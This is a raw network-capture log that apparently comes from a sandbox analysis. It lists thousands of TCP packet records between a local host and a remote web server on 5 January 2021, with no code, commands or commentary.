Jan 5, 2021 10:06:48.735487938 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.735641956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735666990 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735807896 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.735853910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735877991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.735934019 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.736073971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736107111 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736226082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.736331940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736355066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736494064 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.736577034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736613989 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736650944 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.736753941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736787081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.736865997 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.736993074 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737015963 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737232924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737267971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737457991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737495899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737663031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737750053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737934113 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.737960100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738132954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738157988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738357067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738385916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738600969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738626003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738820076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.738842964 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739032030 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739070892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739262104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739286900 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739348888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739465952 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739542961 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.739557028 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.739615917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739626884 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.739712000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739762068 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.739830017 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.739953995 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740030050 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740132093 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740308046 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740386009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740509987 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740664959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740724087 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.740746975 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740956068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.740989923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741029978 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.741036892 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.741220951 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741250992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741425037 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741450071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741580009 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.741664886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741688013 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741892099 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.741919041 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742003918 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742069960 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742175102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742311001 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742353916 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.742368937 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.742441893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742677927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.742753983 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.746400118 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746428967 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746474981 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.746587038 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746612072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746666908 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.746757984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746843100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.746932983 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.747057915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747123003 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747176886 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.747257948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747284889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747421026 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.747505903 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747529984 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747647047 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.747699976 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747731924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747857094 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.747935057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.747960091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748028994 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.748136044 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748199940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748285055 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.748362064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748395920 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748450041 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.748608112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748632908 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748687983 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.748852015 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748883009 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.748996973 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.749070883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749095917 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749135017 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.749279022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749311924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749412060 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.749494076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749563932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749697924 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.749775887 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749805927 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.749850035 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.749947071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750005007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750087976 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.750205040 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750281096 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750413895 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750446081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750695944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750725031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750905991 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.750931978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751101971 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751132965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751177073 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.751190901 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.751296043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751405954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751524925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751570940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751759052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.751838923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.752038002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.752795935 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.753487110 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.754878998 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.754906893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755023956 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.755079031 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755101919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755157948 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.755292892 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755331993 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755484104 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.755500078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755522966 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755723953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755749941 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755821943 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.755939007 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.755965948 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756068945 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.756182909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756207943 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756227970 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.756392956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756416082 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756447077 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.756618977 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756643057 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756678104 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.756867886 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756894112 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.756932974 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.757096052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757121086 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757234097 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.757293940 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757318974 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757368088 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.757533073 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757560968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757695913 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.757774115 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757798910 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.757843971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.757885933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758002043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758074999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758097887 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.758169889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758214951 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.758325100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758441925 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758500099 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.758579969 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758651018 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.758796930 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.758810043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759030104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759059906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759085894 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.759249926 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759273052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759341002 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.759449959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759478092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759533882 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.759720087 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759744883 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759821892 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.759902954 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759926081 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.759978056 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.760164022 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.762605906 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.762629986 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.762698889 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.762794971 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.762820959 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.762927055 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763030052 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763310909 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763338089 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763514042 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763539076 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763741970 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763765097 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.763978958 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764012098 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764179945 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764208078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764389992 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764422894 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764503956 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764795065 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764839888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764940023 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.764961004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765153885 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765193939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765414000 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765423059 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.765436888 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765502930 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.765515089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.765595913 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765635014 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765846968 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765868902 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.765896082 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.766083002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766104937 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766148090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.766305923 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766330957 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766544104 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766570091 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766752005 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.766771078 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767066002 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767093897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767219067 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767246008 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767441034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767466068 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767668962 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767693043 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767874002 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.767885923 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.767904997 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767929077 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.767981052 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.767992020 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.768126965 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768148899 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768202066 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.768341064 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768363953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768398046 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.768485069 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768557072 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768667936 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.768693924 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768805981 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768876076 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.768943071 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.768999100 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769042969 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.769119024 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769238949 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769308090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.769361019 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769481897 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769541025 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.769565105 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769691944 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769785881 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.769793034 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769928932 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.769983053 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.770054102 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770328999 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770350933 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770378113 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.770515919 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770540953 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770677090 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.770730972 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770755053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770807028 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.770966053 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.770987988 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771112919 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.771157980 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771215916 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771281004 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771298885 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.771464109 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771497011 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771601915 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771614075 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.771660089 CET	49170	80	192.168.2.22	79.124.76.20
Jan 5, 2021 10:06:48.771725893 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.771841049 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772110939 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772134066 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772279978 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772363901 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772540092 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772599936 CET	80	49170	79.124.76.20	192.168.2.22
Jan 5, 2021 10:06:48.772763968 CET	80	49170	79.124.76.20	192.168.2.22
